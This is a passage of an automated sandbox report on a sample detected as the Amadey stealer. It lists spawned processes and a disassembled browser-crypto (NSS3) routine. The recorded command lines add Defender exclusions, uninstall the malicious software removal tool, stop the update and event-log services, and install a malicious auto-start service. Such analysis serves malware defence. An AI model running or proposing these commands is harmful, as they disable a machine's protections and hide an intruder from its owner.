Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHDGDGHCAAK.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:14:23
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:14:23
Start date:	10/11/2024
Path:	C:\Users\user\DocumentsHDGDGHCAAK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsHDGDGHCAAK.exe"
Imagebase:	0x680000
File size:	3'258'368 bytes
MD5 hash:	EC648136F42F41AEE2EFDC8361EA2508
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2014400254.0000000000681000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:14:26
Start date:	10/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x7b0000
File size:	3'258'368 bytes
MD5 hash:	EC648136F42F41AEE2EFDC8361EA2508
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2064829735.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:14:27
Start date:	10/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7b0000
File size:	3'258'368 bytes
MD5 hash:	EC648136F42F41AEE2EFDC8361EA2508
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2074643854.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:15:00
Start date:	10/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7b0000
File size:	3'258'368 bytes
MD5 hash:	EC648136F42F41AEE2EFDC8361EA2508
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2928876012.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	19:15:11
Start date:	10/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005413001\test2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"
Imagebase:	0x7ff6a0130000
File size:	2'900'584 bytes
MD5 hash:	DCC94134DB4DA64356CDCD25E7E88625
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:15:16
Start date:	10/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:15:16
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff70b2f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff6abcf0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:15:19
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff618140000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff618140000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff618140000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff618140000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff6da960000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "HYOIZPGT"
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto"
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	19:15:20
Start date:	10/11/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "HYOIZPGT"
Imagebase:	0x7ff704e60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"
Imagebase:	0x7ff70b2f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe
Imagebase:	0x7ff7e8900000
File size:	2'900'584 bytes
MD5 hash:	DCC94134DB4DA64356CDCD25E7E88625
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff6e9600000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	19:15:21
Start date:	10/11/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	19:15:22
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	19:15:22
Start date:	10/11/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74e710000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	19:15:24
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	19:15:24
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	19:15:24
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	19:15:25
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	60
Start time:	19:15:25
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	19:15:26
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	19:15:26
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	63
Start time:	19:15:27
Start date:	10/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 6C6F6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C842120,6C6F7E60), ref: 6C6F6EBC
TlsGetValue.KERNEL32 ref: 6C6F6EDF
EnterCriticalSection.KERNEL32(?), ref: 6C6F6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C6F6F25

Part of subcall function 6C6CA900: TlsGetValue.KERNEL32(00000000,?,6C8414E4,?,6C664DD9), ref: 6C6CA90F
Part of subcall function 6C6CA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6CA94F

PR_Unlock.NSS3 ref: 6C6F6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C6F6FA9
TlsGetValue.KERNEL32 ref: 6C6F70B4
EnterCriticalSection.KERNEL32(?), ref: 6C6F70C8
PR_CallOnce.NSS3(6C8424C0,6C737590), ref: 6C6F7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F7117
SECOID_Init.NSS3 ref: 6C6F7128
PORT_Alloc_Util.NSS3(00000057), ref: 6C6F714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F71A9
PR_NotifyAllCondVar.NSS3 ref: 6C6F71CF
PR_Unlock.NSS3 ref: 6C6F71DD
free.MOZGLUE(?), ref: 6C6F71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F7208
free.MOZGLUE(00000000), ref: 6C6F7221
free.MOZGLUE(00000001), ref: 6C6F7235
TlsGetValue.KERNEL32 ref: 6C6F724A
EnterCriticalSection.KERNEL32(?), ref: 6C6F725E
PR_NotifyCondVar.NSS3 ref: 6C6F7273
PR_Unlock.NSS3 ref: 6C6F7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C6F7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C830148,,defaultModDB,internalKeySlot), ref: 6C6F74CC
free.MOZGLUE(00000000), ref: 6C6F7513
free.MOZGLUE(00000000), ref: 6C6F751B
free.MOZGLUE(00000000), ref: 6C6F7528
free.MOZGLUE(00000000), ref: 6C6F753C
free.MOZGLUE(00000000), ref: 6C6F7550
free.MOZGLUE(00000000), ref: 6C6F7561
free.MOZGLUE(00000000), ref: 6C6F7572
free.MOZGLUE(00000000), ref: 6C6F7583
free.MOZGLUE(00000000), ref: 6C6F7594
free.MOZGLUE(00000000), ref: 6C6F75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C6F75BD
